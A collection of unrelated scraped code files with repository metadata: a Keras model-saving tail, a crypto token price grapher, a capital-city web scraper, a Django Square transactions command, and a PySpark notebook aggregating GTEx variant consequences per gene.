max_queue_size = 10,
workers = 1,
use_multiprocessing = False,
shuffle = True,
initial_epoch = 0)
# Save the Model
model.save('last_saved_model.h5')
print('Training completed successfully and the Model has been saved to a file "last_saved_model.h5"')
| anton500nb/ship_detection | model.py | model.py | py | 9,000 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "tensorflow.reshape",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "tensorflow.reshape",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "tensorflow.reduce_sum",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "tensorflo... |
32958345548 | from argparse import ArgumentParser
from time import sleep
from src.netreq import setContractAddress, requestPrice, requestSymbol
from src.grapher import setGraphSymbol, startGraphThread,addPrice, initanim
from src.contracts import contract_list
import threading
def priceThread():
while True:
price = requestPrice()
if price is not None:
addPrice(price)
else:
print("An error occured while trying to get the price for token")
sleep(4) # As observed from Trader Joe's request intervals
if __name__ == "__main__":
parser = ArgumentParser(
prog="acpy",
description="A python script that utilizes graphql traderjoe subgraph to pull prices from Avalanche's C-Chain tokens")
parser.add_argument("-c", "--contract", help="Address of the contract present on the C-Chain")
parser.add_argument("--token", "-t", choices=contract_list.keys(), required=False, default="PNG", help="Use a built in contract address if you prefer")
args = parser.parse_args()
if args.contract is None and args.token is None:
parser.print_help()
exit(0)
contract_addr = ""
if args.token is not None:
contract_addr = contract_list[args.token]
else:
contract_addr = args.contract
symbol = setContractAddress(contract_addr)
if symbol is None:
print("Error while getting the contract symbol.")
exit(1)
setGraphSymbol(symbol)
initanim()
pricethread = threading.Thread(target=priceThread)
pricethread.start()
startGraphThread()
| gAtrium/acpy | acpy.py | acpy.py | py | 1,591 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "src.netreq.requestPrice",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "src.grapher.addPrice",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "argparse.Argu... |
8343142681 | from bs4 import BeautifulSoup
import requests
country = raw_input("Enter the country:")
#print(country)
site_to_scrape = "https://en.wikipedia.org/wiki/List_of_national_capitals_and_largest_cities_by_country"
r = requests.get(site_to_scrape)
data = r.text
soup = BeautifulSoup(data, "html.parser")
print("Capital: "+soup.find('a',title=country).parent.findNext('td').find('a').string)
| deathBlad3/capitalCities | capitalCity.py | capitalCity.py | py | 373 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 10,
"usage_type": "call"
}
] |
18722144626 | """
@package square_connect.report.management.commands.get_recent_transactions
Gets the most recent transactions from the primary storefronts and adds any selected items to the report database.
We recommend that you run it in a cron job.
"""
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from app.models import Service
from report.models import Report, Item
from data.transaction import PaymentRequest
class Command(BaseCommand):
help = "Gets the last 200 transactions at each service and finds ___-marked items"
# Allows input of report types to take in. Ex. spoilage and shift drinks.
def add_arguments(self, parser):
parser.add_argument('report_type', nargs='+')
def handle(self, *args, **options):
# Refresh the Services if necessary
if Service.objects.count() == 0:
Service.regenerate_services()
# Run for each service with discounts
services = Service.objects.exclude(name__in=settings.SERVICE_EXCLUDES)
for service in services:
# Get the recent transactions for that service
sales_json = PaymentRequest(merchant_id=service.merchant_id).auto()
            # Pass the sales to the report model so it can do its magic
            for report_type in options['report_type']:
                # NOTE: report_type is iterated but not forwarded, so each requested
                # type currently triggers the same call.
                Report.add_items_from_json_data(sales_json, service)
| TrianglePlusPlus/howitzer | square_connect/square_connect/report/management/commands/get_recent_transactions.py | get_recent_transactions.py | py | 1,410 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "app.models.Service.objects.count",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "app.models.Service.objects",
"line_number": 22,
"usage_type": "a... |
31669588144 | # -*- coding: utf-8 -*-
# !/usr/bin/env python
# @Time : 2019-08-06 16:16
# @Author : lidong@immusician.com
# @Site :
# @File : base.py
import requests
from UnitTest.settings import HOST, PORT, HEADERS
class BaseResponse:
def __init__(self):
pass
class BaseRequest:
def __init__(self, host=None, port=None):
self._host = host
if not self._host:
self._host = HOST
self._port = port
if not self._port:
self._port = PORT
self.__url = self._host + ":" + str(self._port)
self.__headers = HEADERS
def _check_url_and_headers(self, url, headers):
url = self.__url + url
if not headers:
headers = self.__headers
return url, headers
def get(self, url, param=None, **kwargs):
headers = kwargs.get("headers", None)
url, headers = self._check_url_and_headers(url, headers)
return requests.get(url, param, headers=headers, **kwargs)
def post(self, url, json=None, **kwargs):
headers = kwargs.get("headers", None)
url, headers = self._check_url_and_headers(url, headers)
        return requests.post(url, json=json, headers=headers, **kwargs)
def run(self):
dir_list = self.__dir__()
for func in dir_list:
if not func.startswith("_"):
if func not in ["get", 'post', 'run']:
getattr(self, func)()
# self._show_data(func, url, ret)
@staticmethod
def _show_data(func_name, url, response):
print("*"*10, func_name, "*"*10)
print("")
print("url: ", url)
print("status: ", response.status_code)
print("json: ", response.json())
print("")
print("")
if __name__ == '__main__':
BaseRequest().run()
| Fushengliangnian/PracticeEssays | UnitTest/base.py | base.py | py | 1,821 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "UnitTest.settings.HOST",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "UnitTest.settings.PORT",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "UnitTest.settings.HEADERS",
"line_number": 28,
"usage_type": "name"
},
{
"api_name"... |
19194610924 | #YAPI Rewrite - Yet Another Package Manager
#Imports
import modules.config_import as config_import
import modules.installer as installer
import gui.interface as interface
import modules.search as search
import json
import sys
import os
try:
os.chdir(os.path.dirname(__file__)) #Change file location if outside of YAPI
except Exception:
pass #Already in directory of YAPI.
if len(sys.argv) != 2:
try:
config = json.loads(config_import.get_config())
os_platform = config['OS.platform']
cache_boolean = ('True' == config['Cache.keep_cache'])
cache_location = config['Cache.cache_location']
search_local = ('True' == config['Search.search_local'])
search_url = config['Search.search_url']
remote_location = config['Remote.location']
remote_branch = config['Remote.branch']
file_extension = config['Remote.file_extension']
language_selected = config['Languages.selected']
    except Exception:
print('Config not able to be imported. Run \"python3 yapi.py config\" to fix the error')
#Main Program
if len(sys.argv) == 1:
result = interface.start()
elif len(sys.argv) == 2:
if sys.argv[1] == 'config':
config_import.update_config()
elif len(sys.argv) == 3:
if sys.argv[1] == 'search':
matches = search.search(search_url, file_extension, search_local, cache_location, sys.argv[2])
for match in matches:
print(match)
elif sys.argv[1] == 'download':
file_name = sys.argv[2] + file_extension
file_url = remote_location + os_platform + '/' + remote_branch + '/scripts/' + file_name
os.chdir(cache_location)
output = installer.get_file(file_url, file_name)
elif sys.argv[1] == 'run':
file_name = sys.argv[2] + file_extension
os.chdir(cache_location)
output = installer.run_script(file_name, cache_boolean)
elif sys.argv[1] == 'install':
output = installer.full_install(sys.argv[2])
| Wabri/rewrite | yapi.py | yapi.py | py | 1,975 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "os.chdir",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 1... |
72625343714 | import json
import csv
import requests
from bs4 import BeautifulSoup
# ▒█▀▄▒█▀▄ lab. PR | FAF | FCIM | UTM | Fall 2023
# ░█▀▒░█▀▄ FAF-212 Cristian Brinza lab2 homework
print('')
print('▒█▀▄▒█▀▄ lab. PR | FAF | FCIM | UTM | Fall 2023')
print('░█▀▒░█▀▄ FAF-212 Cristian Brinza lab2 homework ')
print('')
# User-Agent Rotation: List of user agents to mimic different browsers.
USER_AGENTS = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.3',
# Add more user agents if needed
]
def fetch_web_content(product_url):
"""Fetches the content of the given URL."""
# User-Agent Rotation: Select a user agent based on the hash of the URL.
headers = {
'User-Agent': USER_AGENTS[hash(product_url) % len(USER_AGENTS)]
}
try:
# Error Handling: Catch network errors or invalid URLs.
response = requests.get(product_url, headers=headers)
response.raise_for_status()
return BeautifulSoup(response.content, 'html.parser')
except requests.RequestException as e:
print(f"Error fetching URL {product_url}. Error: {e}")
return None
def extract_owner_details(parsed_content):
"""Extracts the owner details from the parsed content."""
owner_details = {}
owner_section = parsed_content.find('dl', {'class': 'adPage__aside__stats__owner'})
owner_details['Name'] = owner_section.find('a', {'class': 'adPage__aside__stats__owner__login buyer_experiment'}).text
owner_details['On website since'] = owner_section.find('span').text
last_update_section = owner_section.find_next('div')
owner_details['Last Update'] = last_update_section.text
ad_type_section = last_update_section.find_next('div')
owner_details['Ad type'] = ad_type_section.text
views_section = ad_type_section.find_next('div')
owner_details['Views'] = views_section.text
return owner_details
def extract_product_info(parsed_content):
"""Extracts product information from the parsed content."""
product_info = {}
description_section = parsed_content.find('div', {'class': 'adPage__content__description grid_18'})
if description_section:
product_info['Description'] = description_section.text
else:
product_info['Description'] = 'Description not found.'
features_section = parsed_content.find('div', {'class': 'adPage__content__features'}).find_all('h2')
for feature in features_section:
feature_details = {}
ul_section = feature.find_next('ul')
if ul_section:
list_items = ul_section.find_all('li')
for item in list_items:
spans = item.find_all('span')
if len(spans) == 2:
feature_details[spans[0].text] = spans[1].text
else:
feature_details[spans[0].text] = 'None'
product_info[feature.text] = feature_details
return product_info
def export_to_csv(filename, data_list):
"""Exports the scraped data to a CSV file."""
# Export to CSV: Write the scraped data into a CSV format.
keys = data_list[0].keys()
with open(filename, 'w', newline='') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(data_list)
def read_urls_from_file(filename):
"""Reads URLs from a given file."""
with open(filename, 'r') as file:
return [url.strip() for url in file.readlines()]
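# Expected layout of the .txt file for menu option 2 - one product URL per line,
# e.g. (hypothetical addresses):
#   https://example.com/ro/12345
#   https://example.com/ro/67890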
def main():
"""Main function to interact with the user and perform operations."""
all_data = []
while True:
print("\n--- Menu ---")
print("1. Scrape product details")
print("2. Scrape product details from a .txt file")
print("3. Export all scraped data")
print("4. Exit")
choice = input("Enter your choice: ")
if choice == "1":
# Scrape Multiple URLs: Allow user to input multiple URLs separated by commas.
target_urls = input("Enter the product URLs (comma-separated): ").split(',')
for url in target_urls:
parsed_content = fetch_web_content(url.strip())
if parsed_content:
owner_details = extract_owner_details(parsed_content)
product_info = extract_product_info(parsed_content)
final_data = {
'URL': url,
'Owner Details': owner_details,
'Product Info': product_info
}
all_data.append(final_data)
print(f"Scraped data for {url}")
elif choice == "2":
# Scrape URLs from a .txt file
file_path = input("Enter the path to the .txt file containing the product URLs (without extension): ")+".txt"
try:
target_urls = read_urls_from_file(file_path)
for url in target_urls:
parsed_content = fetch_web_content(url)
if parsed_content:
owner_details = extract_owner_details(parsed_content)
product_info = extract_product_info(parsed_content)
final_data = {
'URL': url,
'Owner Details': owner_details,
'Product Info': product_info
}
all_data.append(final_data)
print(f"Scraped data for {url}")
except FileNotFoundError:
print(f"Error: File '{file_path}' not found!")
elif choice == "3":
print("\n--- Export Options ---")
print("1. JSON")
print("2. TXT")
print("3. CSV")
print('4. Console')
export_choice = input("Enter your choice: ")
if export_choice == "1":
filename = input("Enter filename (without extension): ")
with open(f"{filename}.json", "w") as outfile:
outfile.write(json.dumps(all_data, indent=2, ensure_ascii=False))
print(f"Data saved to {filename}.json")
elif export_choice == "2":
filename = input("Enter filename (without extension): ")
with open(f"{filename}.txt", "w") as outfile:
outfile.write(json.dumps(all_data, indent=2, ensure_ascii=False))
print(f"Data saved to {filename}.txt")
elif export_choice == "3":
filename = input("Enter filename (without extension): ")
# Export to CSV: Save the scraped data into a CSV file.
export_to_csv(f"{filename}.csv", all_data)
print(f"Data saved to {filename}.csv")
elif export_choice == "4":
                print(json.dumps(all_data, indent=2, ensure_ascii=False)) # Print all the scraped data to console
else:
print("Invalid choice!")
elif choice == "4":
print("Exiting program. Goodbye!")
break
else:
print("Invalid choice! Please try again.")
if __name__ == '__main__':
main()
| CristianBrinza/UTM | year3/pr/lab2/homework.py | homework.py | py | 7,543 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "requests.RequestException",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "csv.Dic... |
22518135513 | import os
# os.environ['CUDA_VISIBLE_DEVICES'] = "0" # in case you are using a multi GPU workstation, choose your GPU here
import tqdm
import pytorch_lightning as pl
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
import torch.nn.functional as F
import pandas as pd
from datasets import load_dataset
from torch.utils.data import TensorDataset, DataLoader
import numpy as np
#define your neural net here:
class MLP(pl.LightningModule):
def __init__(self, input_size, xcol='emb', ycol='avg_rating'):
super().__init__()
self.input_size = input_size
self.xcol = xcol
self.ycol = ycol
self.layers = nn.Sequential(
nn.Linear(self.input_size, 1024),
#nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(1024, 128),
#nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128, 64),
#nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(64, 16),
#nn.ReLU(),
nn.Linear(16, 1)
)
def forward(self, x):
return self.layers(x)
def training_step(self, batch, batch_idx):
x = batch[self.xcol]
y = batch[self.ycol].reshape(-1, 1)
x_hat = self.layers(x)
loss = F.mse_loss(x_hat, y)
return loss
def validation_step(self, batch, batch_idx):
x = batch[self.xcol]
y = batch[self.ycol].reshape(-1, 1)
x_hat = self.layers(x)
loss = F.mse_loss(x_hat, y)
return loss
def configure_optimizers(self):
optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)
return optimizer
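# Usage sketch: scoring 768-d CLIP ViT-L/14 embeddings with a trained head
# (the checkpoint name matches save_name defined further down):
#   mlp = MLP(768); mlp.load_state_dict(torch.load("linear_predictor_L14_MSE.pth"))
#   scores = mlp(torch.randn(4, 768))  # -> tensor of shape (4, 1)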
# load the training data
x = np.load("/mnt/spirit/ava_x.npy")
y = np.load("/mnt/spirit/ava_y.npy")
val_percentage = 0.05 # 5% of the training data will be used for validation
train_border = int(x.shape[0] * (1 - val_percentage)) # shape is an attribute, not a callable
train_tensor_x = torch.Tensor(x[:train_border]) # transform to torch tensor
train_tensor_y = torch.Tensor(y[:train_border])
train_dataset = TensorDataset(train_tensor_x,train_tensor_y) # create your datset
train_loader = DataLoader(train_dataset, batch_size=256, shuffle=True, num_workers=16) # create your dataloader
val_tensor_x = torch.Tensor(x[train_border:]) # transform to torch tensor
val_tensor_y = torch.Tensor(y[train_border:])
'''
print(train_tensor_x.size())
print(val_tensor_x.size())
print( val_tensor_x.dtype)
print( val_tensor_x[0].dtype)
'''
val_dataset = TensorDataset(val_tensor_x,val_tensor_y) # create your datset
val_loader = DataLoader(val_dataset, batch_size=512, num_workers=16) # create your dataloader
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = MLP(768).to(device) # CLIP embedding dim is 768 for CLIP ViT L 14
optimizer = torch.optim.Adam(model.parameters())
# choose the loss you want to optimize for
criterion = nn.MSELoss()
criterion2 = nn.L1Loss()
epochs = 50
model.train()
best_loss = 999
save_name = "linear_predictor_L14_MSE.pth"
for epoch in range(epochs):
losses = []
losses2 = []
for batch_num, input_data in enumerate(train_loader):
optimizer.zero_grad()
x, y = input_data
x = x.to(device).float()
y = y.to(device)
output = model(x)
loss = criterion(output, y)
loss.backward()
losses.append(loss.item())
optimizer.step()
if batch_num % 1000 == 0:
print('\tEpoch %d | Batch %d | Loss %6.2f' % (epoch, batch_num, loss.item()))
#print(y)
print('Epoch %d | Loss %6.2f' % (epoch, sum(losses)/len(losses)))
losses = []
losses2 = []
for batch_num, input_data in enumerate(val_loader):
optimizer.zero_grad()
x, y = input_data
x = x.to(device).float()
y = y.to(device)
output = model(x)
loss = criterion(output, y)
lossMAE = criterion2(output, y)
#loss.backward()
losses.append(loss.item())
losses2.append(lossMAE.item())
#optimizer.step()
if batch_num % 1000 == 0:
print('\tValidation - Epoch %d | Batch %d | MSE Loss %6.2f' % (epoch, batch_num, loss.item()))
print('\tValidation - Epoch %d | Batch %d | MAE Loss %6.2f' % (epoch, batch_num, lossMAE.item()))
#print(y)
print('Validation - Epoch %d | MSE Loss %6.2f' % (epoch, sum(losses)/len(losses)))
print('Validation - Epoch %d | MAE Loss %6.2f' % (epoch, sum(losses2)/len(losses2)))
if sum(losses)/len(losses) < best_loss:
print("Best MAE Val loss so far. Saving model")
best_loss = sum(losses)/len(losses)
print( best_loss )
torch.save(model.state_dict(), save_name )
# (no unconditional save here: it would overwrite the best-validation checkpoint written above)
print( best_loss )
print("training done")
# inference test with dummy samples from the val set, sanity check
print("inference test with dummy samples from the val set, sanity check")
model.eval()
output = model(x[:5].to(device))
print(output.size())
print(output)
| microsoft/LMOps | promptist/aesthetic/train_predictor.py | train_predictor.py | py | 5,077 | python | en | code | 2,623 | github-code | 1 | [
{
"api_name": "pytorch_lightning.LightningModule",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "t... |
40888591974 | # ---
# jupyter:
# jupytext:
# cell_metadata_json: true
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.4.2
# kernelspec:
# display_name: Python [conda env:anaconda-spark30_prev2]
# language: python
# name: conda-env-anaconda-spark30_prev2-py
# ---
# +
import pyspark
from pyspark.sql import SparkSession
import pyspark.sql.functions as f
import pyspark.sql.types as t
import glow
import os
# -
import json
# +
MEM = os.popen("ulimit -m").read()
if MEM.startswith("unlimited"):
print("Memory not constrained, using all available memory...")
import psutil
MEM = psutil.virtual_memory().available / 1024
MEM = int(MEM)
N_CPU = int(os.popen("nproc").read())
print("memory: %dk" % MEM)
print("number of cores: %d" % N_CPU)
# -
MEM = int(MEM * 0.8)
#os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages io.projectglow:glow_2.12:0.3.1-SNAPSHOT,io.delta:delta-core_2.11:0.5.0 --driver-memory %dk pyspark-shell' % MEM
os.environ['PYSPARK_SUBMIT_ARGS'] = " ".join([
# '--packages ' + ",".join([
# "io.projectglow:glow_2.12:0.3.1-SNAPSHOT",
# "io.delta:delta-core_2.12:0.5.1-SNAPSHOT",
# ]),
'--driver-memory %dk' % MEM,
'--jars ' + ",".join([
"/data/nasif12/home_if12/hoelzlwi/Projects/glow/core/target/scala-2.12/glow-assembly-0.3.1-SNAPSHOT.jar",
"/data/nasif12/home_if12/hoelzlwi/Projects/deltalake/target/scala-2.12/delta-core-assembly-0.5.1-SNAPSHOT.jar",
]),
'pyspark-shell'
])
os.environ['PYSPARK_SUBMIT_ARGS']
MAX_FAILURES=4
spark = (
SparkSession.builder
.appName('abc')
#.config("spark.local.dir", os.environ.get("TMP"))
.config("spark.local.dir", "/data/cephrbgssd/scratch/hoelzlwi")
.config("spark.master", f"local[{N_CPU},{MAX_FAILURES}]")
.config("spark.sql.shuffle.partitions", "2001")
.config("spark.sql.execution.arrow.enabled", "true")
#.config("spark.network.timeout", "1800s")
#.config("spark.executor.heartbeatInterval", "600s")
.config("spark.driver.maxResultSize", "48G")
# .config("spark.databricks.io.cache.enabled", "true") # only enable when local storage is actually on local SSD
.config("spark.task.maxFailures", MAX_FAILURES)
.getOrCreate()
)
glow.register(spark)
spark
spark.sparkContext.getConf().get("spark.local.dir")
spark.sparkContext.getConf().get("spark.task.maxFailures")
## define custom display Head to simplify looking at spark DataFrames.
def displayHead(df, nrows = 5):
return df.limit(nrows).toPandas()
# GTEX_PATH = '/s/project/variantDatabase/deltaLake/gtex_normalized'
GTEX_PATH = '/s/project/variantDatabase/gtex/v8/hg38/normalized.delta/'
GTEX_VEP_PATH = '/s/project/variantDatabase/gtex/v8/hg38/vep.delta/'
def zip_explode_cols(df: pyspark.sql.dataframe.DataFrame, cols: list, target_struct, target_colnames=None):
if target_colnames is None:
target_colnames = cols
df = df.withColumn(target_struct, f.explode(f.arrays_zip(*cols)))
df = df.withColumn(target_struct, f.struct(*[
f.col(target_struct + "." + actualName).alias(targetName)
for targetName, actualName in zip(target_colnames, df.schema[target_struct].dataType.fieldNames())
]))
return df
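# Usage sketch (mirrors the call made further below): zip two parallel array columns,
# then explode them into one struct row per element:
#   df = zip_explode_cols(df, cols=["genotypes", "num_alt_alleles"],
#                         target_colnames=["gt", "num_alt_alleles"], target_struct="genotype")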
gtex_df = (
spark
.read
.format('parquet')
.load(GTEX_PATH)
.withColumn("num_alt_alleles", f.expr("genotype_states(genotypes)"))
.drop("names")
)
gtex_df.printSchema()
# + {"active": ""}
# # TODO: remove
# gtex_df = (
# gtex_df
# .withColumn("call_summary_stats", f.expr("call_summary_stats(genotypes)"))
# .withColumn("dp_summary_stats", f.expr("dp_summary_stats(genotypes)"))
# .withColumn("gq_summary_stats", f.expr("gq_summary_stats(genotypes)"))
# .drop("names")
# )
# +
# filter out low-quality variants
gtex_df = gtex_df.filter(f.array_contains(f.col("filters"), "PASS") & (f.col("qual") >= 99))
# convert one-sized arrays to scalars
gtex_df = (
gtex_df
.withColumnRenamed("alternateAlleles", "alternateAllele").withColumn("alternateAllele", f.expr("alternateAllele[0]"))
.withColumn("INFO_AC", f.expr("INFO_AC[0]"))
.withColumn("INFO_AF", f.expr("INFO_AF[0]"))
.withColumn("INFO_MLEAC", f.expr("INFO_MLEAC[0]"))
.withColumn("INFO_MLEAF", f.expr("INFO_MLEAF[0]"))
)
# count unique elements
gtex_df = (
gtex_df
.withColumn(
"zygocity",
f.struct(
f.expr('size(num_alt_alleles)').alias("n_samples"),
f.expr('size(filter(num_alt_alleles, x -> x == 2))').alias("n_homo"),
f.expr('size(filter(num_alt_alleles, x -> x == 1))').alias("n_hetero"),
f.expr('size(filter(num_alt_alleles, x -> x == 0))').alias("n_ref"),
f.expr('size(filter(num_alt_alleles, x -> x == -1))').alias("n_not_measured"),
f.expr('array_distinct(filter(num_alt_alleles, x -> not x in (-1, 0, 1, 2)))').alias("other")
)
)
# .withColumn("n_homozygous", f.expr('size(filter(num_alt_alleles, x -> x == 2))'))
# .withColumn("n_heterozygous", f.expr('size(filter(num_alt_alleles, x -> x == 1))'))
# .withColumn("n_ref", f.expr('size(filter(num_alt_alleles, x -> x == 0))'))
# .withColumn("n_not_measured", f.expr('size(filter(num_alt_alleles, x -> x == -1))'))
# .withColumn("n_not_measured", f.expr('size(filter(num_alt_alleles, x -> x == -1))'))
)
# -
gtex_df.printSchema()
x = displayHead(gtex_df)
x.T
alleleCounts = gtex_df.select("INFO_AC", f.expr("zygocity.*")).drop("other").toPandas()
alleleCounts
import plotnine as pn
pn.ggplot(alleleCounts, pn.aes(x="INFO_AC")) + pn.stat_ecdf() + pn.scale_x_log10() + pn.ylab("ECDF") + pn.ggtitle("ECDF of allele counts")
(
pn.ggplot(alleleCounts, pn.aes(x="n_homo"))
+ pn.stat_ecdf()
+ pn.scale_x_log10()
+ pn.xlab("Nr. of homozygous samples per variant")
+ pn.ylab("ECDF")
+ pn.ggtitle("ECDF of homozygous allele counts")
)
(
pn.ggplot(alleleCounts, pn.aes(x="n_hetero"))
+ pn.stat_ecdf()
+ pn.scale_x_log10()
+ pn.xlab("Nr. of heterozygous samples per variant")
+ pn.ylab("ECDF")
+ pn.ggtitle("ECDF of heterozygous allele counts")
)
gtex_singlegt = (
zip_explode_cols(
gtex_df,
cols=[
"genotypes",
"num_alt_alleles",
],
target_colnames=[
"gt",
"num_alt_alleles",
],
target_struct="genotype"
)
.drop(
"genotypes",
"num_alt_alleles",
)
)
gtex_singlegt.printSchema()
# +
# # filter for variants that have either an exclusive heterozygous or an exclusive homozygous sample
# gtex_singlegt = gtex_singlegt.filter(
# f"(genotype.num_alt_alleles == 1 AND zygocity.n_hetero == 1)"
# + f" OR {"incorrectly_encoded_metadata": "(genotype.num_alt_alleles == 2 AND zygocity.n_homo == 1)\""}
# )
# -
vep_df = (
spark
.read
.format('parquet')
.load(GTEX_VEP_PATH)
)
vep_df.printSchema()
displayHead(vep_df)
# +
IMPACT_LEVELS = ["HIGH", "MODERATE", "LOW", "MODIFIER"]
LOF_LEVELS = ["HC", "LC"]
csq_terms = {}
for csq_type in ['intergenic_consequences','motif_feature_consequences', 'regulatory_feature_consequences', 'transcript_consequences']:
unique_consequences = (
vep_df
.selectExpr(csq_type + ".consequence_terms as " + csq_type)
.withColumn(csq_type, f.explode(csq_type))
.withColumn(csq_type, f.explode(csq_type))
.drop_duplicates()
)
# unique_consequences.printSchema()
unique_consequences = unique_consequences.toPandas()
csq_terms[csq_type] = unique_consequences
# -
csq_terms
exploded_df = (
vep_df
.withColumn("transcript_consequence", f.expr("explode(transcript_consequences)")).drop("transcript_consequences")
.drop(
"colocated_variants",
"intergenic_consequences",
'most_severe_consequence',
'motif_feature_consequences',
'regulatory_feature_consequences',
)
)
exploded_df.printSchema()
transcript_consequences = exploded_df.select(
"*",
f.struct(*[
f.array_contains("transcript_consequence.consequence_terms", name).cast("byte").alias(name)
for name in csq_terms["transcript_consequences"].iloc[:,0].values
]).alias("consequences"),
f.struct(*[
(f.col("transcript_consequence.impact") == name).alias(name)
for name in IMPACT_LEVELS
]).alias("impact_level"),
f.struct(*[
(f.col("transcript_consequence.lof") == name).alias(name)
for name in LOF_LEVELS
]).alias("lof_level"),
)
transcript_consequences.printSchema()
# + {"active": ""}
# # unused
#
# def array_to_onehot_columns(df, input_col, output_col):
# from pyspark.ml.feature import CountVectorizer
#
# vectorizer = CountVectorizer(inputCol=input_col, outputCol=output_col, binary=True).fit(df)
# transformed_df = vectorizer.transform(df)
# vocabulary = vectorizer.vocabulary
#
# udf_to_array = f.udf(lambda v: v.toArray().tolist(), 'array<double>')
#
# transformed_df = (
# transformed_df
# .withColumn(output_col, udf_to_array(output_col)) \
# .withColumn(output_col, f.struct(*[
# f.col(output_col)[i].astype('boolean').alias(vocabulary[i]) for i in range(len(vocabulary))
# ]))
# )
#
# return transformed_df
# -
gtex_with_consequences = gtex_singlegt.withColumn("start", f.expr("start + 1")).join(
transcript_consequences.withColumnRenamed("seq_region_name", "contigName"),
["contigName", "start", "end"],
how="inner"
)
gtex_with_consequences.printSchema()
grouped_df = gtex_with_consequences.groupby(
"contigName",
"genotype.gt.sampleId",
"genotype.num_alt_alleles",
"transcript_consequence.gene_id"
)
# +
counts = grouped_df.agg(
f.struct(*[
# sum booleans as (0, 1) integer types
f.sum(
f.col("consequences." + c).cast("int")
).alias(c)
for c in transcript_consequences.schema["consequences"].dataType.fieldNames()
]).alias("consequences"),
f.struct(*[
# sum booleans as (0, 1) integer types
f.sum(
f.col("impact_level." + c).cast("int")
).alias(c)
for c in transcript_consequences.schema["impact_level"].dataType.fieldNames()
]).alias("impact_level"),
f.struct(*[
# sum booleans as (0, 1) integer types
f.sum(
f.col("lof_level." + c).cast("int")
).alias(c)
for c in transcript_consequences.schema["lof_level"].dataType.fieldNames()
]).alias("lof_level"),
f.struct(*[
f.min(f.col("transcript_consequence.sift_score")).alias("sift_min"),
f.mean(f.col("transcript_consequence.sift_score")).alias("sift_mean"),
f.max(f.col("transcript_consequence.sift_score")).alias("sift_max"),
f.min(f.col("transcript_consequence.polyphen_score")).alias("polyphen_min"),
f.mean(f.col("transcript_consequence.polyphen_score")).alias("polyphen_mean"),
f.max(f.col("transcript_consequence.polyphen_score")).alias("polyphen_max"),
f.min(f.col("transcript_consequence.cadd_raw")).alias("cadd_min"),
f.mean(f.col("transcript_consequence.cadd_raw")).alias("cadd_mean"),
f.max(f.col("transcript_consequence.cadd_raw")).alias("cadd_max"),
]).alias("scores"),
)
# -
counts.printSchema()
counts = counts.groupby("contigName", "gene_id", "sampleId").pivot("num_alt_alleles", [1, 2]).agg(
f.struct([
f.struct(*[
f.sum(f.col("consequences." + c)).alias(c)
for c in counts.schema["consequences"].dataType.fieldNames()
]).alias("consequences"),
f.struct(*[
f.sum(f.col("impact_level." + c)).alias(c)
for c in counts.schema["impact_level"].dataType.fieldNames()
]).alias("impact_level"),
f.struct(*[
f.sum(f.col("lof_level." + c)).alias(c)
for c in counts.schema["lof_level"].dataType.fieldNames()
]).alias("lof_level"),
f.struct(*[
f.sum(f.col("scores." + c)).alias(c)
for c in counts.schema["scores"].dataType.fieldNames()
]).alias("scores"),
])
)
counts = counts.withColumnRenamed("1", "heterozygous").withColumnRenamed("2", "homozygous")
counts.printSchema()
counts.write.format("delta").save('/s/project/rep/processed/VEP/vep_counts3.deltalake')
written_counts = (
spark
.read
.format('delta')
.load('/s/project/rep/processed/VEP/vep_counts3.deltalake')
)
displayHead(written_counts)
# +
from pyspark.sql import functions as F
from pyspark.sql.types import DataType, StructType, ArrayType
from pyspark.sql import DataFrame
import re
def __rename_nested_field__(in_field: DataType, fieldname_normaliser):
if isinstance(in_field, ArrayType):
dtype = ArrayType(__rename_nested_field__(in_field.elementType, fieldname_normaliser), in_field.containsNull)
elif isinstance(in_field, StructType):
dtype = StructType()
for field in in_field.fields:
